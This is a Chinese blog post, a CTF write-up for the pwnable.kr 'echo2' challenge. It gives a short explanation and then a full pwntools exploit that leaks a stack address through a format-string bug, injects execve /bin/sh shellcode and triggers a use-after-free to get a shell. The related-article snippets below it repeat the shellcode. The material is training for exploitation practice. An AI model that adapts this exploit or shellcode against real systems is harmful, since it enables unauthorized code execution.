[BUUCTF-pwn]——pwnable_echo2

最新推荐文章于 2024-01-29 02:22:19 发布
最新推荐文章于 2024-01-29 02:22:19 发布
阅读量1k 收藏
点赞数
分类专栏: # BUUCTF # 堆利用 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Y_peak/article/details/121363734
版权

[BUUCTF-pwn]——pwnable_echo2

附件

题解

没那么多时间写详细的题解,就简单理一下思路了。
首先这个题目中通过 2. : FSB echo 我们可以泄露出来栈上的地址,这里我们泄露出来的是当前栈帧rbp中存储的地址,也就是mian函数的rbp地址。通过rbp与变量的关系,我们可以得到我们在程序开始运行时写入name的地址。由于栈是可执行的,我们只需要将shellcode写入我们要写入的name的位置即可。不过长度要小于24。
做到这一步第一步就完成了,下面我们需要利用uaf漏洞来劫持程序的执行流。
在这里插入图片描述
这里我们首先始放o然后再申请o的空间对其进行修改,由于指针没有置零,最后可以利用o来进行执行。

exploit

from pwn import *
p = process('./echo2')
p = remote('pwnable.kr',9011)
elf = ELF('./echo2')
context_level = 'debug'
context.arch = 'amd64'
p.recvuntil("your name? : ")
shellcode = b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
p.sendline(shellcode)
p.recvuntil(b'> ')
p.sendline(b'2')
payload = b'%10$p' + b'a'*3
p.sendline(payload)
p.recvuntil(b'0x')
shellcode_addr = int(p.recvuntil(b'aaa',drop=True),16)-0x20
success('shellcode_addr----->:',hex(shellcode_addr))
print('-------------------------------------------------------------------------------------')
p.recvuntil(b'> ')
p.sendline(b'4')
p.recvuntil(b'want to exit? (y/n)')
p.sendline(b'n')

p.recvuntil(b'> ')
p.sendline(b'3')
p.recvuntil(b'hello \n')
p.sendline(b'a'*24 + p64(shellcode_addr))

p.interactive()
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 788
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 387
BUUCTF 做题练习
pwnable(echo2)【64位格式化字符串&uaf】
九层台
01-26 782
echo1差不多都没开启任何保护,有一个格式化字符串漏洞 64位格式化字符串和32位有些不同64位寄存器是靠寄存器来传参的(说白了格式化字符串就是打印参数的值,或者向参数位置指向的地址处写入数据) 64位寄存器传参的顺序: rdi, rsi, rdx, rcx, r8, r9 这是执行printf时候的状态。 这个是输出的数据 0x1cd605f,0x7f81ace85790,0x70252...
pwnable.kr】 echo2
子曰小玖的博客
06-10 603
https://r00tnb.github.io/2018/03/10/pwnable.kr-echo2/ 前言 这道题和上一题主逻辑一样,主要是漏洞不一样了,这道题考察格式化支付串漏洞和堆的释放后重用漏洞。 分析 先分析反编译代码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27...
pwnable echo2
weixin_30522095的博客
11-03 137
pwnable echo2 linux 32位程序 涉及FSB和UAF漏洞的利用,先%x泄露地址,然后利用UAF漏洞进行利用 code: 转载于:https://www.cnblogs.com/bongbongbong/p/4934660.html
pwnable.kr echo2
you_need_me的博客
06-10 482
这个题是fsb+uafint __cdecl main(int argc, const char **argv, const char **envp) { unsigned int *v3; // rsi _QWORD *v4; // rax unsigned int v6; // [rsp+Ch] [rbp-24h] __int64 v7; // [rsp+10h] [rbp-2...
初始heap,pwnable_echo2
qq_51687381的博客
07-25 194
from pwn import * p=process("./echo2") elf=ELF("./echo2") p.recvuntil("hey, what's your name? : ") shellcode=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" p.sendline(shellcode) p.recvuntil(b"> ") p.se.
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF]-PWN:pwnable_hacknote解析
2301_79326813的博客
01-29 407
先看保护32位,没开pie,got表可修改看ida总的来说就是alloc创建堆块,free释放堆块,show打印堆块内容但alloc处的函数比较特别,他会先申请一个0x8大小的堆来存放与puts相关的指针。
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1134
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1735
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 487
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 559
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 321
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3316
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 310
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 305
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1196
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值